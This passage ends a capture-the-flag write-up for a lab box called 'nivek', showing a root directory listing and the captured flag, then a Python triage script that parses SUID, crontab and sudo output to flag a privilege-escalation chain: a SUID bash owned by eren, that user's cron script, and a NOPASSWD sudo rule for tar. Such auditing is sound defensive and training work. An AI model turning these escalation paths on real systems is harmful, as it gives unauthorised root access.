drwxr-xr-x  2 root root 20480 Jul 25  2021 Downloads
drwx------  2 root root  4096 Jul 25  2021 .gconf
drwx------  2 root root  4096 Jul 25  2021 .gvfs
-rw-------  1 root root   318 Jul 25  2021 .ICEauthority
drwxr-xr-x  3 root root  4096 Jul 25  2021 .local
drwx------  5 root root  4096 Jul 25  2021 .mozilla
drwxr-xr-x  2 root root  4096 Jul 25  2021 Music
drwxr-xr-x  2 root root  4096 Jul 25  2021 .nano
drwxr-xr-x  2 root root  4096 Jul 25  2021 Pictures
-rw-r--r--  1 root root   148 Aug 17  2015 .profile
drwxr-xr-x  2 root root  4096 Jul 25  2021 Public
-rw-------  1 root root    33 Jul 25  2021 root.txt
-rw-r--r--  1 root root    66 Jul 26  2021 .selected_editor
drwxr-xr-x  2 root root  4096 Jul 25  2021 Templates
drwxr-xr-x  3 root root  4096 Jul 25  2021 .thumbnails
drwxr-xr-x  2 root root  4096 Jul 25  2021 Videos
-rw-------  1 root root     0 Jul 26  2021 .Xauthority
-rw-------  1 root root   341 Jul 25  2021 .xsession-errors
root@nivek:/root# cat root.txt
cat root.txt
299c10117c1940f21b70a391ca125c5d
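An added triage helper (not part of the original write-up or the lab) that parses the enumeration output above (the SUID listing, /etc/crontab and `sudo -l`) and reports the three findings that chain together on this box: a SUID shell owned by eren, a cron job running that user's script every five minutes, and a NOPASSWD sudo rule for /bin/tar. The sample inputs are copied from the output above; the /bin/ping line is constructed as a benign control, and the binary lists are assumptions to extend per environment.

```python
"""Offline triage of the enumeration output gathered on the box (added example)."""
import re
from dataclasses import dataclass
from typing import List

# Samples copied from the output above; the /bin/ping line is a constructed benign control.
SUID_LS_SAMPLE = """\
-rwsr-xr-x 1 eren eren 1037464 Jul 26  2021 /usr/bin/bash
-rwsr-xr-x 1 root root   44168 Jul 25  2021 /bin/ping
"""
CRONTAB_SAMPLE = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 * * * * eren /home/eren/backup.sh
"""
SUDO_L_SAMPLE = """\
User eren may run the following commands on nivek:
    (root) NOPASSWD: /bin/tar
"""

SHELL_LIKE = {"bash", "sh", "dash", "zsh"}
# Binaries that run arbitrary commands when invoked with elevated privileges
# (tar via --checkpoint-action, as shown above); extend for your environment.
EXEC_CAPABLE = {"tar"}


@dataclass
class Finding:
    severity: str
    user: str      # account the finding lets a local user act as
    path: str
    detail: str


_LS_RE = re.compile(
    r"^(?P<mode>[-lbcdps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+\S+"
    r"\s+\d+\s+\S+\s+\d+\s+\S+\s+(?P<path>\S+)$"
)
_CRON_RE = re.compile(r"^(?:\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")
_SUDO_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")


def suid_findings(ls_text: str) -> List[Finding]:
    """Parse `ls -l` lines and flag SUID files that are shells or not root-owned."""
    out = []
    for line in ls_text.splitlines():
        m = _LS_RE.match(line.strip())
        if not m or m["mode"][3] not in "sS":      # 4th char is the owner-execute slot
            continue
        name = m["path"].rsplit("/", 1)[-1]
        if name in SHELL_LIKE:
            out.append(Finding("high", m["owner"], m["path"],
                               f"SUID shell {m['path']} gives any local user a shell as {m['owner']}"))
        elif m["owner"] != "root":
            out.append(Finding("medium", m["owner"], m["path"],
                               f"SUID binary {m['path']} is owned by non-root user {m['owner']}"))
    return out


def cron_findings(crontab_text: str, suid: List[Finding]) -> List[Finding]:
    """Flag non-root cron jobs whose script can be rewritten through a SUID shell."""
    impersonable = {f.user for f in suid if f.severity == "high"}
    out = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                                # skip comments and VAR=value lines
        m = _CRON_RE.match(line)
        if not m or m["user"] == "root":
            continue
        script = m["cmd"].split()[0]
        if m["user"] in impersonable:
            out.append(Finding("high", m["user"], script,
                               f"cron runs {script} as {m['user']}; that user's SUID shell lets "
                               f"anyone edit the script, and it runs on the next tick"))
    return out


def sudo_findings(sudo_l_text: str) -> List[Finding]:
    """Parse `sudo -l` rule lines and flag commands that can spawn arbitrary commands."""
    out = []
    for line in sudo_l_text.splitlines():
        m = _SUDO_RE.match(line.strip())
        if not m:
            continue
        runas = m["runas"].split(":")[0].strip()    # "(root)" or "(root : root)"
        for cmd in m["cmds"].split(","):
            path = cmd.strip().split()[0]
            if path.rsplit("/", 1)[-1] in SHELL_LIKE | EXEC_CAPABLE:
                tag = "NOPASSWD " if "NOPASSWD" in m["tags"] else ""
                out.append(Finding("high", runas, path,
                                   f"sudo ({runas}) {tag}{path}: arbitrary commands as {runas}"))
    return out


def triage(ls_text=SUID_LS_SAMPLE, crontab_text=CRONTAB_SAMPLE, sudo_text=SUDO_L_SAMPLE):
    suid = suid_findings(ls_text)
    return suid + cron_findings(crontab_text, suid) + sudo_findings(sudo_text)


if __name__ == "__main__":
    for f in triage():
        print(f"[{f.severity}] {f.detail}")
```

On a live host, feed it the real `find / -perm -4000 -exec ls -l {} \;`, `/etc/crontab` and `sudo -l` output instead of the samples.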

Source: http://www.coloradmin.cn/o/1341093.html
